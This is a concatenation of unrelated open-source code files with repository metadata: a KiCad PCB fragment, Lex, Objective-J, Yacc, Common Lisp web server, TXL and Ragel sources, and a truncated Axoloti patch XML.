(xy 99.969774 66.341898) (xy 100.047795 66.530256) (xy 100.161063 66.699774) (xy 100.305226 66.843937) (xy 100.474744 66.957205) (xy 100.663102 67.035226) (xy 100.863061 67.075) (xy 101.066939 67.075) (xy 101.266898 67.035226) (xy 101.455256 66.957205) (xy 101.624774 66.843937) (xy 101.768937 66.699774) (xy 101.789379 66.66918) (xy 102.306201 67.186003) (xy 102.329999 67.215001) (xy 102.445724 67.309974) (xy 102.577753 67.380546) (xy 102.721014 67.424003) (xy 102.832667 67.435) (xy 102.832676 67.435) (xy 102.869999 67.438676) (xy 102.907322 67.435) (xy 106.007678 67.435) (xy 106.045 67.438676) (xy 106.082322 67.435) (xy 106.082333 67.435) (xy 106.193986 67.424003) (xy 106.337247 67.380546) (xy 106.469276 67.309974) (xy 106.585001 67.215001) (xy 106.608803 67.185998) (xy 107.191004 66.603798) (xy 107.220001 66.580001) (xy 107.314974 66.464276) (xy 107.385546 66.332247) (xy 107.41496 66.235281) (xy 107.454463 66.218918) (xy 107.722252 66.039987) (xy 107.949987 65.812252) (xy 108.128918 65.544463) (xy 108.252168 65.246912) (xy 108.315 64.931033) (xy 108.315 64.608967) (xy 108.252168 64.293088) (xy 108.128918 63.995537) (xy 107.949987 63.727748) (xy 107.722252 63.500013) (xy 107.722233 63.5) (xy 107.722252 63.499987) (xy 107.949987 63.272252) (xy 108.128918 63.004463) (xy 108.252168 62.706912) (xy 108.315 62.391033) (xy 108.315 62.068967) (xy 108.252168 61.753088) (xy 108.128918 61.455537) (xy 107.949987 61.187748) (xy 107.722252 60.960013) (xy 107.722233 60.96) (xy 107.722252 60.959987) (xy 107.949987 60.732252) (xy 108.128918 60.464463) (xy 108.252168 60.166912) (xy 108.315 59.851033) (xy 108.315 59.528967) (xy 108.252168 59.213088) (xy 108.128918 58.915537) (xy 107.949987 58.647748) (xy 107.722252 58.420013) (xy 107.722233 58.42) (xy 107.722252 58.419987) (xy 107.949987 58.192252) (xy 108.128918 57.924463) (xy 108.252168 57.626912) (xy 108.315 57.311033) (xy 108.315 56.988967) (xy 108.252168 56.673088) (xy 108.128918 56.375537) (xy 107.949987 56.107748) (xy 107.722252 55.880013) (xy 107.6134 55.80728) (xy 107.635808 55.745413) (xy 106.68 54.789605) (xy 105.724192 55.745413) (xy 105.7466 55.80728) (xy 105.637748 55.880013) (xy 105.410013 56.107748) (xy 105.41 56.107767) (xy 105.409987 56.107748) (xy 105.182252 55.880013) (xy 105.0734 55.80728) (xy 105.095808 55.745413) (xy 104.14 54.789605) (xy 103.184192 55.745413) (xy 103.2066 55.80728) (xy 103.097748 55.880013) (xy 102.870013 56.107748) (xy 102.691082 56.375537) (xy 102.567832 56.673088) (xy 102.505 56.988967) (xy 102.505 57.311033) (xy 102.567832 57.626912) (xy 102.691082 57.924463) (xy 102.870013 58.192252) (xy 103.097748 58.419987) (xy 103.097767 58.42) (xy 103.097748 58.420013) (xy 102.870013 58.647748) (xy 102.691082 58.915537) (xy 102.567832 59.213088) (xy 102.505 59.528967) (xy 102.505 59.851033) (xy 102.567832 60.166912) (xy 102.691082 60.464463) (xy 102.870013 60.732252) (xy 103.097748 60.959987) (xy 103.097767 60.96) (xy 103.097748 60.960013) (xy 102.870013 61.187748) (xy 102.691082 61.455537) (xy 102.635 61.590931) (xy 102.635 61.493061) (xy 102.595226 61.293102) (xy 102.517205 61.104744) (xy 102.403937 60.935226) (xy 102.259774 60.791063) (xy 102.090256 60.677795) (xy 101.901898 60.599774) (xy 101.701939 60.56) (xy 101.498061 60.56) (xy 101.298102 60.599774) (xy 101.109744 60.677795) (xy 100.940226 60.791063) (xy 100.796063 60.935226) (xy 100.682795 61.104744) (xy 100.62916 61.234229) (xy 100.431939 61.195) (xy 100.228061 61.195) (xy 100.028102 61.234774) (xy 99.839744 61.312795) (xy 99.670226 61.426063) (xy 99.526063 61.570226) (xy 99.412795 61.739744) (xy 99.334774 61.928102) (xy 99.295 62.128061) (xy 79.45 62.128061) (xy 79.45 55.664001) (xy 80.050482 55.664001) (xy 80.122188 55.867197) (xy 80.237876 56.047408) (xy 80.386499 56.201587) (xy 80.562345 56.323809) (xy 80.758657 56.409376) (xy 80.96789 56.455) (xy 81.31789 56.455) (xy 81.31789 55.497) (xy 81.57189 55.497) (xy 81.57189 56.455) (xy 81.92189 56.455) (xy 82.131123 56.409376) (xy 82.327435 56.323809) (xy 82.503281 56.201587) (xy 82.651904 56.047408) (xy 82.767592 55.867197) (xy 82.839298 55.664001) (xy 82.712392 55.497) (xy 81.57189 55.497) (xy 81.31789 55.497) (xy 80.177388 55.497) (xy 80.050482 55.664001) (xy 79.45 55.664001) (xy 79.45 55.075999) (xy 80.050482 55.075999) (xy 80.177388 55.243) (xy 81.31789 55.243) (xy 81.31789 54.285) (xy 81.57189 54.285) (xy 81.57189 55.243) (xy 82.712392 55.243) (xy 82.839298 55.075999) (xy 82.767592 54.872803) (xy 82.651904 54.692592) (xy 82.632628 54.672595) (xy 102.498282 54.672595) (xy 102.542039 54.991675) (xy 102.647205 55.296088) (xy 102.740186 55.470044) (xy 103.004587 55.565808) (xy 103.960395 54.61) (xy 104.319605 54.61) (xy 105.275413 55.565808) (xy 105.41 55.517062) (xy 105.544587 55.565808) (xy 106.500395 54.61) (xy 106.859605 54.61) (xy 107.815413 55.565808) (xy 108.079814 55.470044) (xy 108.220704 55.180429) (xy 108.302384 54.868892) (xy 108.321718 54.547405) (xy 108.277961 54.228325) (xy 108.172795 53.923912) (xy 108.079814 53.749956) (xy 107.815413 53.654192) (xy 106.859605 54.61) (xy 106.500395 54.61) (xy 105.544587 53.654192) (xy 105.41 53.702938) (xy 105.275413 53.654192) (xy 104.319605 54.61) (xy 103.960395 54.61) (xy 103.004587 53.654192) (xy 102.740186 53.749956) (xy 102.599296 54.039571) (xy 102.517616 54.351108) (xy 102.498282 54.672595) (xy 82.632628 54.672595) (xy 82.503281 54.538413) (xy 82.327435 54.416191) (xy 82.131123 54.330624) (xy 81.92189 54.285) (xy 81.57189 54.285) (xy 81.31789 54.285) (xy 80.96789 54.285) (xy 80.758657 54.330624) (xy 80.562345 54.416191) (xy 80.386499 54.538413) (xy 80.237876 54.692592) (xy 80.122188 54.872803) (xy 80.050482 55.075999) (xy 79.45 55.075999) (xy 79.45 49.064001) (xy 80.050482 49.064001) (xy 80.122188 49.267197) (xy 80.237876 49.447408) (xy 80.386499 49.601587) (xy 80.562345 49.723809) (xy 80.758657 49.809376) (xy 80.96789 49.855) (xy 81.31789 49.855) (xy 81.31789 48.897) (xy 81.57189 48.897) (xy 81.57189 49.855) (xy 81.92189 49.855) (xy 82.131123 49.809376) (xy 82.327435 49.723809) (xy 82.503281 49.601587) (xy 82.651904 49.447408) (xy 82.767592 49.267197) (xy 82.839298 49.064001) (xy 82.712392 48.897) (xy 81.57189 48.897) (xy 81.31789 48.897) (xy 80.177388 48.897) (xy 80.050482 49.064001) (xy 79.45 49.064001) (xy 79.45 47.7) (xy 80.8991 47.7) ) ) ) )
KiCad
5
GregAC/opentitan
hw/ip/usbdev/pmod/tusb1106pmod-kicad/usbphy.kicad_pcb
[ "Apache-2.0" ]
%include Unicode.lex NULL_CHAR=\u0000 TAB=\u0009 LF=\u000A VERTICAL_TAB=\u000B FF=\u000C CR=\u000D NEL=\u0085 UNICODE_CC_WHITESPACE_CHARS={TAB}{VERTICAL_TAB} UNICODE_CC_SEPARATOR_CHARS={LF}{FF}{CR}{NEXT_LINE} ZERO_WIDTH_SP=\u200B ZERO_WIDTH_NBSP=\uFEFF OTHER_CF_WHITESPACE=\u180E UNICODE_CF_WHITESPACE_CHARS={ZERO_WIDTH_SP}{ZERO_WIDTH_NBSP}{OTHER_CF_WHITESPACE} LINE_SEPARATOR=\u2028 UNICODE_ZL_CHARS={LINE_SEPARATOR} PARAGRAPH_SEPARATOR=\u2029 UNICODE_ZP_CHARS={PARAGRAPH_SEPARATOR} SP=\u0020 NBSP=\u00A0 OTHER_SP=\u1680\u2000-\u200A\u202F\u205F\u3000 UNICODE_ZS_CHARS={SP}{NBSP}{OTHER_SP}
Lex
3
SirDuke/resharper-unity
resharper/resharper-yaml/src/Yaml/Psi/Parsing/Chars.lex
[ "Apache-2.0" ]
@import <Foundation/CPObject.j> @import <AppKit/CPView.j> @import <AppKit/CPButton.j> @import <AppKit/CPWebView.j> @import "LOBoard.j" @implementation LOInfoView : CPView { } - (void)drawRect:(CGRect)r { [[CPColor whiteColor] setFill] var path = [CPBezierPath bezierPath]; [path appendBezierPathWithRoundedRect:CGRectMake(5, 0, CGRectGetWidth([self bounds]) - 10.0, CGRectGetHeight([self bounds])) xRadius:10 yRadius:10]; [path fill]; } @end @implementation AppController : CPObject { } - (CPPanel)initInfoWindow { var infoWindow = [[CPPanel alloc] initWithContentRect:CGRectMake(400, 50, 320, 480) styleMask:CPHUDBackgroundWindowMask | CPResizableWindowMask]; [infoWindow setFloatingPanel:YES]; var _infoContent = [infoWindow contentView], _iconImage = [[CPImage alloc] initWithContentsOfFile:"Resources/icon.png" size:CPSizeMake(59, 60)], _iconView = [[CPImageView alloc] initWithFrame:CGRectMake(125, 0, 59, 60)]; [_iconView setImage:_iconImage]; [_infoContent addSubview:_iconView]; var _infoView = [[LOInfoView alloc] initWithFrame:CGRectMake(0, 65, 320, 395)], _webView = [[CPWebView alloc] initWithFrame:CGRectMake(20, 0, 270, 370)]; [_webView loadHTMLString:@"<center><h3>Lights Off</h3></center> <p>Lights Off is a fantastic game exclusively for iPhone and iPod touch and inspired by Tiger Electronic's 'Lights Out'.</p> <p>The goal of the game is simply to switch all of the lights off, but it's harder than it looks! Give the first few levels a try in the playable demo to the left.</p><center><img src='Resources/avail_on_app_store.png'></center>"]; [_infoView addSubview:_webView]; [_infoContent addSubview:_infoView]; return infoWindow; } - (void)applicationDidFinishLaunching:(CPNotification)aNotification { /* Enable Logging (DEBUG) */ // CPLogRegister(CPLogPopup); var rootWindow = [[CPWindow alloc] initWithContentRect:CGRectMakeZero() styleMask:CPBorderlessBridgeWindowMask]; [rootWindow setBackgroundColor:[CPColor grayColor]]; [rootWindow orderFront:self]; var infoWindow = [self initInfoWindow], gameWindow = [[CPPanel alloc] initWithContentRect:CGRectMake(50, 50, 324, 482) styleMask:CPHUDBackgroundWindowMask]; [gameWindow setFloatingPanel:YES]; [gameWindow setTitle:@"Lights Off"]; contentView = [gameWindow contentView]; var _board = [[LOBoard alloc] initWithFrame:CGRectMake(2, 0, 320, 480)], _bgImage = [[CPImage alloc] initWithContentsOfFile:"Resources/lo-background.png" size:CPSizeMake(320, 480)]; [_board setImage:_bgImage]; [_board resetBoard]; var _buttonImage = [[CPImage alloc] initWithContentsOfFile:"Resources/button-reset.png" size:CPSizeMake(90, 28)], _buttonPressImage = [[CPImage alloc] initWithContentsOfFile:"Resources/button-reset-press.png" size:CPSizeMake(90, 28)], _resetButton = [[CPButton alloc] initWithFrame:CGRectMake(195, 422, 90, 28)]; [_resetButton setImage:_buttonImage]; [_resetButton setAlternateImage:_buttonPressImage]; [_resetButton setBordered:NO]; [contentView addSubview:_board]; [contentView addSubview:_resetButton]; [_resetButton setTarget:_board]; [_resetButton setAction:@selector(resetBoard)]; [gameWindow orderFront:self]; [infoWindow orderFront:self]; } @end
Jasmin
4
JavascriptID/sourcerer-app
src/test/resources/samples/langs/Objective-J/LightsOff.j
[ "MIT" ]
/************************************************************************** // Copyright (c) 2004 Max-Planck-Institut Saarbruecken (Germany) // All rights reserved. // // This file is part of BenchmarkParser // // $URL$ // $Id$ // SPDX-License-Identifier: LGPL-3.0-or-later // // // Author(s) : Lutz Kettner // Franziska Ebert <febert@mpi-sb.mpg.de> **************************************************************************/ %{ /* C/C++ declaration section */ /* ========================= */ //#include <cstdlib> /* for atoi */ #include <string> /* for std::string */ #include <fstream> /* for std::ifstream */ #include <benchmark_parser.h> #include <benchmark_visitor.h> #include <iostream> static Benchmark_visitor* visitor; /* global visitor used during parsing */ /* declaration for flex parser call yylex */ int yylex( void); /* error function called for parse errors */ void yyerror( char *s) { visitor->parse_error( std::string(s)); } /* Use C++ std::string as semantic value to communicate with lexer */ #define YYSTYPE std::string // Public parser interface, check with decl. in benchmark_parser.h // --------------------------------------------------------------- // Opens file 'name' and parses it. Uses visitor 'v' while parsing. // Returns false if something went wrong. See the visitor for details. bool benchmark_parse_file( std::string name, Benchmark_visitor* v); // Starts parsing from stream 'in' with the associated filename 'name' // (or analogous meaning for different streams) counting linenumbers // starting from 'n'. Uses visitor 'v' while parsing. Returns false if // something went wrong. See the visitor for details of the error reporting. bool benchmark_parse_stream( std::istream& in, std::string name, Benchmark_visitor* v, int n); %} /* Elementary data types */ /* --------------------- */ %token INTEGER %token FNUMBER %token STRING %token ERROR %token UNKNOWN_TOKEN %token MINUS_INFTY %token PLUS_INFTY %token COUNTERCLOCKWISE %token CLOCKWISE %token VOID /* Structure tokens */ /* ---------------- */ %token FileFormat %token BenchmarkName %token Classification %token List %token Rational %token Polynomial_1 %token Point_2 %token AlgebraicReal %token ConicPoint_2 %token LineSegment_2 %token Conic_2 %token CircularArc_2 %token LineArc_2 %token CircularPoint_2 %token ConicArc_2 %token Circle_2 %token Cubic_2 %token Quadric_3 %% /* Grammar */ /* ======= */ input: /* an input is a potentially empty sequence of files */ /* empty */ | error { /* parse error restart here */ } | input file ; file: /* must start with unique header */ file_format file_header_options file_classification file_body ; file_format: /* mandatory fileformat descriptor */ error_rules {} | FileFormat '(' STRING ',' INTEGER ',' INTEGER ')' { visitor->accept_file_format( $3, atoi( $5.c_str()), atoi( $7.c_str()), std::string("")); } | FileFormat '(' STRING ',' INTEGER ',' INTEGER ',' STRING ')' { visitor->accept_file_format( $3, atoi( $5.c_str()), atoi( $7.c_str()), $9); } ; file_header_options: /* sequence of optional file header entries */ /* empty */ | file_header_options file_header_option ; file_header_option: /* single optional file header entry */ BenchmarkName '(' STRING ')' { visitor->accept_benchmark_name( $3); } ; file_classification: /* */ error_rules {} | classificat | file_classification classificat ; classificat: /* */ Classification '(' STRING ',' STRING ',' STRING ',' STRING ',' STRING ',' STRING ')' { visitor->accept_classification( $3, $5, $7, $9, $11, $13); } ; file_body: /* sequence of statements (stmt) */ /* empty */ | file_body stmt ; stmt_sequence: /* comma separated sequence of statements (stmt) */ /* empty */ | stmt_sequence_non_empty ; stmt_sequence_non_empty: /* comma separated sequence of statements (stmt) */ stmt | stmt_sequence_non_empty ',' stmt ; stmt: error { /* parse error restart here */ } error_rules {} | List { visitor->begin_list(); } '(' stmt_sequence ')' { visitor->end_list(); } | Circle_2 { visitor->begin_circle_2(); } '(' circle_2 ')' { visitor->end_circle_2(); } | Conic_2 conic_2 | LineSegment_2 { visitor->begin_line_segment_2(); } '(' point_2 ',' point_2 ')' { visitor->end_line_segment_2(); } | ConicArc_2 conic_arc_2 | Cubic_2 '(' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ')' { visitor->accept_cubic_2( $3, $5, $7, $9, $11, $13, $15, $17, $19, $21); } | Quadric_3 '(' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ')' { visitor->accept_quadric_3( $3, $5, $7, $9, $11, $13, $15, $17, $19, $21); } | CircularPoint_2 {visitor->begin_CircularPoint_2();} '('circular_arc_point')' {visitor->end_CircularPoint_2();} | LineArc_2 {visitor->begin_LineArc_2();} '('line_arc_2')' {visitor->end_LineArc_2();} |CircularArc_2 { visitor->begin_CircularArc_2();} '('circular_arc_2 ')' { visitor->end_CircularArc_2();} ; circular_arc_point: circular_arc_point: error_rules{} | point_2 | AlgebraicReal ',' AlgebraicReal ; line_arc_2: error_rules {} | LineSegment_2 | point_2 ',' point_2 | CircularPoint_2 '(' circular_arc_point ')' ',' CircularPoint_2 '(' circular_arc_point ')' ; circular_arc_2: error_rules {} | Circle_2 '(' circle_2 ')' | Circle_2 '(' circle_2 ')' ',' CircularPoint_2 '(' circular_arc_point ')' ',' CircularPoint_2 '(' circular_arc_point ')' | point_2 ',' point_2 ',' rational ; circle_2: error_rules {} | point_2 ',' rational | point_2 ',' INTEGER { visitor->accept_integer($3); } ; conic_2: /* */ error_rules {} | '(' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ',' INTEGER ')' { visitor->accept_conic_2( $2, $4, $6, $8, $10, $12); } ; conic_arc_2: /* */ error_rules {} | '(' Conic_2 { visitor->begin_conic_arc_2(); } conic_2 ',' ConicPoint_2 conic_point_2 ',' ConicPoint_2 conic_point_2 ',' orientation { visitor->accept_orientation( $12); } ')' { visitor->end_conic_arc_2(); } | '(' ConicPoint_2 { visitor->begin_conic_arc_2(); } conic_point_2 ')' { visitor->end_conic_arc_2(); } ; integer_sequence1: /* comma separated integers */ error_rules {} | INTEGER { visitor->accept_integer( $1); } | integer_sequence1 ',' INTEGER { visitor->accept_integer( $3); } ; point_2: /* a 2d point */ error_rules {} | Point_2 '(' INTEGER ',' INTEGER ')' { visitor->accept_point_2( $3, $5); } | Point_2 '(' INTEGER ',' INTEGER ',' INTEGER ')' { visitor->accept_point_2( $3, $5, $7); } | Point_2 '(' Rational '(' INTEGER ',' INTEGER ')' ',' Rational '(' INTEGER ',' INTEGER ')' ')' { visitor->accept_point_2( $5, $7, $12, $14); } ; conic_point_2: /* */ error_rules {} | '(' Conic_2 { visitor->begin_conic_point_2();} conic_2 ',' algorint ')' { visitor->end_conic_point_2(); } ; algorint: /* */ error_rules {} | algebraic_real ',' inti | infty ',' INTEGER { visitor->accept_infty( $1); visitor->accept_integer( $3); } ; algebraic_real: /* */ error_rules {} | AlgebraicReal { visitor->begin_algebraic_real(); } '(' Polynomial_1 { visitor->begin_polynomial_1(); } '(' integer_sequence1 ')' { visitor->end_polynomial_1(); } ',' rational ',' rational ',' INTEGER { visitor->accept_integer($15); } ')' { visitor->end_algebraic_real(); } ; rational: /* */ error_rules {} | Rational '(' INTEGER ',' INTEGER ')' { visitor->accept_rational( $3, $5); } ; inti: /* */ INTEGER { visitor->accept_integer( $1); } | infty { visitor->accept_infty( $1); } ; infty: /* */ MINUS_INFTY | PLUS_INFTY ; orientation: /* */ COUNTERCLOCKWISE | CLOCKWISE | VOID ; double_val: /* a double value can be either an FNUMBER or an INTEGER */ FNUMBER | INTEGER { visitor->accept_integer( $1); } ; error_rules: ERROR { visitor->parse_error( $1); } | UNKNOWN_TOKEN { visitor->unknown_token( $1); } ; /* End of Grammar */ /* ============== */ %% // Opens file 'name' and parses it. Uses visitor 'v' while parsing. // Returns false if something went wrong. See the visitor for details. bool benchmark_parse_file( std::string name, Benchmark_visitor* v) { std::ifstream in( name.c_str()); if ( ! in) { v->parse_error( std::string( "cannot open file '") + name + std::string( "'.")); return false; } visitor = v; benchmark_init_lexer( in, name, 1); yyparse(); return ! v->error(); } // Starts parsing from stream 'in' with the associated filename 'name' // (or analogous meaning for different streams) counting linenumbers // starting from 'n'. Uses visitor 'v' while parsing. Returns false if // something went wrong. See the visitor for details of the error reporting. bool benchmark_parse_stream( std::istream& in, std::string name, Benchmark_visitor* v, int n) { visitor = v; benchmark_init_lexer( in, name, n); yyparse(); return ! v->error(); } /* EOF */
Yacc
5
ffteja/cgal
Circular_kernel_2/benchmark/parser/benchmark_parser.y
[ "CC0-1.0" ]
;; house.lisp (in-package :house) ;;;;;;;;;; System tables (defparameter *channels* (make-hash-table)) ;;;;;;;;;; Function definitions ;;;;; Buffer/listen-related (defmethod start ((port integer)) (let ((server (socket-listen usocket:*wildcard-host* port :reuse-address t :element-type 'octet)) (conns (make-hash-table))) (unwind-protect (loop (loop for ready in (wait-for-input (cons server (alexandria:hash-table-keys conns)) :ready-only t) do (process-ready ready conns))) (loop for c being the hash-keys of conns do (loop while (socket-close c))) (loop while (socket-close server))))) (defmethod process-ready ((ready stream-server-usocket) (conns hash-table)) (setf (gethash (socket-accept ready :element-type 'octet) conns) nil)) (defmethod process-ready ((ready stream-usocket) (conns hash-table)) (let ((buf (or (gethash ready conns) (setf (gethash ready conns) (make-instance 'buffer :bi-stream (flex-stream ready)))))) (if (eq :eof (buffer! buf)) (ignore-errors (remhash ready conns) (socket-close ready)) (let ((too-big? (> (total-buffered buf) +max-request-size+)) (too-old? (> (- (get-universal-time) (started buf)) +max-request-age+)) (too-needy? (> (tries buf) +max-buffer-tries+))) (cond (too-big? (error! +413+ ready) (remhash ready conns)) ((or too-old? too-needy?) (error! +400+ ready) (remhash ready conns)) ((and (request buf) (zerop (expecting buf))) (remhash ready conns) (when (contents buf) (setf (parameters (request buf)) (nconc (parse buf) (parameters (request buf))))) (handler-case (handle-request ready (request buf)) (http-assertion-error () (error! +400+ ready)) ((and (not warning) (not simple-error)) (e) (error! +500+ ready e)))) (t (setf (contents buf) nil))))))) (defmethod buffer! ((buffer buffer)) (handler-case (let ((stream (bi-stream buffer))) (incf (tries buffer)) (loop for char = (read-char-no-hang stream) until (null char) do (push char (contents buffer)) do (incf (total-buffered buffer)) when (request buffer) do (decf (expecting buffer)) when (starts-with-subseq '(#\linefeed #\return #\linefeed #\return) (contents buffer)) do (multiple-value-bind (parsed expecting) (parse buffer) (setf (request buffer) parsed (expecting buffer) expecting) (return char)) when (> (total-buffered buffer) +max-request-size+) return char finally (return char))) (error () :eof))) ;;;;; Parse-related (defmethod parse-params ((params null)) nil) (defmethod parse-params ((params string)) (loop for pair in (split "&" params) for (name val) = (split "=" pair) collect (cons (->keyword name) (or val "")))) (defmethod parse ((str string)) (let ((lines (split "\\r?\\n" str))) (destructuring-bind (req-type path http-version) (split " " (pop lines)) (declare (ignore req-type)) (assert-http (string= http-version "HTTP/1.1")) (let* ((path-pieces (split "\\?" path)) (resource (first path-pieces)) (parameters (second path-pieces)) (req (make-instance 'request :resource resource :parameters parameters))) (loop for header = (pop lines) for (name value) = (split ": " header) until (null name) do (push (cons (->keyword name) value) (headers req))) (setf (parameters req) (append (parse-params (parameters req)) (parse-params (pop lines)))) req)))) (defmethod parse ((buf buffer)) (let ((str (coerce (reverse (contents buf)) 'string))) (if (request buf) (parse-params str) (parse str)))) ;;;;; Handling requests (defmethod handle-request ((socket usocket) (req request)) (aif (lookup (resource req) *handlers*) (funcall it socket (parameters req)) (error! +404+ socket))) (defun crlf (&optional (stream *standard-output*)) (write-char #\return stream) (write-char #\linefeed stream) (values)) (defmethod write! ((res response) (socket usocket)) (handler-case (with-timeout (.2) (let ((stream (flex-stream socket))) (flet ((write-ln (&rest sequences) (mapc (lambda (seq) (write-sequence seq stream)) sequences) (crlf stream))) (write-ln "HTTP/1.1 " (response-code res)) (write-ln "Content-Type: " (content-type res) "; charset=" (charset res)) (write-ln "Cache-Control: no-cache, no-store, must-revalidate") (when (keep-alive? res) (write-ln "Connection: keep-alive") (write-ln "Expires: Thu, 01 Jan 1970 00:00:01 GMT")) (awhen (body res) (write-ln "Content-Length: " (write-to-string (length it))) (crlf stream) (write-ln it)) (values)))) (trivial-timeout:timeout-error () (values)))) (defmethod write! ((res sse) (socket usocket)) (let ((stream (flex-stream socket))) (handler-case (with-timeout (.2) (format stream "~@[id: ~a~%~]~@[event: ~a~%~]~@[retry: ~a~%~]data: ~a~%~%" (id res) (event res) (retry res) (data res))) (trivial-timeout:timeout-error () (values))))) (defmethod error! ((err response) (socket usocket) &optional instance) (declare (ignorable instance)) (ignore-errors (write! err socket) (socket-close socket))) ;;;;; Channel-related (defmethod subscribe! ((channel symbol) (socket usocket)) (push socket (lookup channel *channels*)) nil) (defmethod publish! ((channel symbol) (message string)) (awhen (lookup channel *channels*) (setf (lookup channel *channels*) (loop with msg = (make-instance 'sse :data message) for socket in it when (ignore-errors (write! msg socket) (force-output (socket-stream socket)) socket) collect it))))
Common Lisp
4
adlerliu/500lines
event-web-framework/code/house.lisp
[ "CC-BY-3.0" ]
% Keyword normalizer for PHP 3,4,5 source % J.R. Cordy, Queen's University, July 2011 % This program normalizes all keywords in a PHP source program % to lower case. The result can be processed case-sensitive % using -nocase to simulate PHP case-sensitivity rules for % variable names when necessary. #pragma -case include "php.grm" rule main skipping [IdOrKey] replace $ [key] K [key] by K [tolower] end rule
TXL
4
grammarware/slps
topics/grammars/php/cordy/PHP345/Txl/phpkw.txl
[ "BSD-3-Clause" ]
%%{ machine CharacterNames; yc_sp = yc_09 | yc_0A | yc_0B | yc_0C | yc_0D | yc_20; # [\t\n\v\f\r ] EOF = 0; # end of stream marker (we'll remove this requirement with advance to rl6's eof) # character synonyms yc_zero = 0x0000; # '\0'; yc_tab = 0x0009; # '\t'; yc_space = 0x0020; # ' '; yc_exclamation = 0x0021; # '!'; yc_quotation = yc_22; # '"'; yc_number_sign = 0x0023; # '#'; yc_dollar = 0x0024; # '$'; yc_percent = 0x0025; # '%'; yc_ampersand = 0x0026; # '&'; yc_apostrophe = yc_27; # '\''; yc_left_paren = 0x0028; # '('; yc_right_paren = 0x0029; # ')'; yc_asterisk = 0x002A; # '*'; yc_plus = 0x002B; # '+'; yc_comma = 0x002C; # ','; yc_minus = 0x002D; # '-'; yc_dot = 0x002E; # '.'; yc_slash = 0x002F; # '/'; yc_colon = 0x003A; # ':'; yc_less = 0x003C; # '<'; yc_equals = 0x003D; # '='; yc_greater = 0x003E; # '>'; yc_at_sign = 0x0040; # '@'; yc_left_bracket = 0x005B; # '['; #yc_backslash = 0x005C; # '\\'; yc_right_bracket = 0x005D; # ']'; yc_caret = 0x005E; # '^'; yc_underscore = 0x005F; # '_'; yc_accent = yc_60; # '`'; yc_left_brace = 0x007B; # '{'; yc_vert_bar = 0x007C; # '|'; yc_right_brace = 0x007D; # '}'; yc_tilde = 0x007E; # '~'; # old character synonyms yc_wide_zero = 0x00; # '\0'; yc_wide_tab = yc_09; # '\t'; yc_wide_space = yc_20; # ' '; yc_wide_exclamation = yc_21; # '!'; yc_wide_quotation = yc_22; # '"'; yc_wide_number_sign = yc_23; # '#'; yc_wide_dollar = yc_24; # '$'; yc_wide_percent = yc_25; # '%'; yc_wide_ampersand = yc_26; # '&'; yc_wide_apostrophe = yc_27; # '\''; yc_wide_left_paren = yc_28; # '('; yc_wide_right_paren = yc_29; # ')'; yc_wide_asterisk = yc_2A; # '*'; yc_wide_plus = yc_2B; # '+'; yc_wide_comma = yc_2C; # ','; yc_wide_minus = yc_2D; # '-'; yc_wide_dot = yc_2E; # '.'; yc_wide_slash = yc_2F; # '/'; yc_wide_colon = yc_3A; # ':'; yc_wide_less = yc_3C; # '<'; yc_wide_equals = yc_3D; # '='; yc_wide_greater = yc_3E; # '>'; yc_wide_at_sign = yc_40; # '@'; yc_wide_left_bracket = yc_5B; # '['; #yc_wide_backslash = yc_5C; # '\\'; yc_wide_right_bracket = yc_5D; # ']'; yc_wide_caret = yc_5E; # '^'; yc_wide_underscore = yc_5F; # '_'; yc_wide_accent = yc_60; # '`'; yc_wide_left_brace = yc_7B; # '{'; yc_wide_vert_bar = yc_7C; # '|'; yc_wide_right_brace = yc_7D; # '}'; yc_wide_tilde = yc_7E; # '~'; }%%
Ragel in Ruby Host
4
ZhekehZ/catboost
library/tokenizer/charnames.rl
[ "Apache-2.0" ]
<patch-1.0 appVersion="1.0.12"> <obj type="midi/in/keyb note" uuid="ac0cd98e6c0373b7be73d25900342a62ebcf5f" name="keyb_1" x="14" y="14"> <params/> <attribs> <spinner attributeName="note" value="36"/> </attribs> </obj> <obj type="patch/outlet b" uuid="191792f616d4835dba0b55375474a12942e5bcbd" name="PAD 1 Trigger" x="238" y="28"> <params/> <attribs/> </obj> <obj type="patch/outlet f" uuid="d18a9a550bcaaebac94e25983bd0e27dbfd7233c" name="PAD 1 Velocity" x="322" y="28"> <params/> <attribs/> </obj> <obj type="midi/in/keyb note" uuid="ac0cd98e6c0373b7be73d25900342a62ebcf5f" name="keyb_2" x="112" y="56"> <params/> <attribs> <spinner attributeName="note" value="37"/> </attribs> </obj> <obj type="patch/outlet b" uuid="191792f616d4835dba0b55375474a12942e5bcbd" name="PAD 2 Trigger" x="238" y="70"> <params/> <attribs/> </obj> <obj type="patch/outlet f" uuid="d18a9a550bcaaebac94e25983bd0e27dbfd7233c" name="PAD 2 Velocity" x="322" y="70"> <params/> <attribs/> </obj> <obj type="midi/in/keyb note" uuid="ac0cd98e6c0373b7be73d25900342a62ebcf5f" name="keyb_3" x="14" y="98"> <params/> <attribs> <spinner attributeName="note" value="38"/> </attribs> </obj> <obj type="patch/outlet b" uuid="191792f616d4835dba0b55375474a12942e5bcbd" name="PAD 3 Trigger" x="238" y="112"> <params/> <attribs/> </obj> <obj type="patch/outlet f" uuid="d18a9a550bcaaebac94e25983bd0e27dbfd7233c" name="PAD 3 Velocity" x="322" y="112"> <params/> <attribs/> </obj> <obj type="midi/in/keyb note" uuid="ac0cd98e6c0373b7be73d25900342a62ebcf5f" name="keyb_4" x="112" y="140"> <params/> <attribs> <spinner attributeName="note" value="39"/> </attribs> </obj> <obj type="patch/outlet b" uuid="191792f616d4835dba0b55375474a12942e5bcbd" name="PAD 4 Trigger" x="238" y="154"> <params/> <attribs/> </obj> <obj type="patch/outlet f" uuid="d18a9a550bcaaebac94e25983bd0e27dbfd7233c" name="PAD 4 Velocity" x="322" y="154"> <params/> <attribs/> </obj> <obj type="midi/in/keyb note" uuid="ac0cd98e6c0373b7be73d25900342a62ebcf5f" name="keyb_5" x="14" y="182"> <params/> <attribs> <spinner attributeName="note" value="40"/> </attribs> </obj> <obj type="patch/outlet b" uuid="191792f616d4835dba0b55375474a12942e5bcbd" name="PAD 5 Trigger" x="238" y="196"> <params/> <attribs/> </obj> <obj type="patch/outlet f" 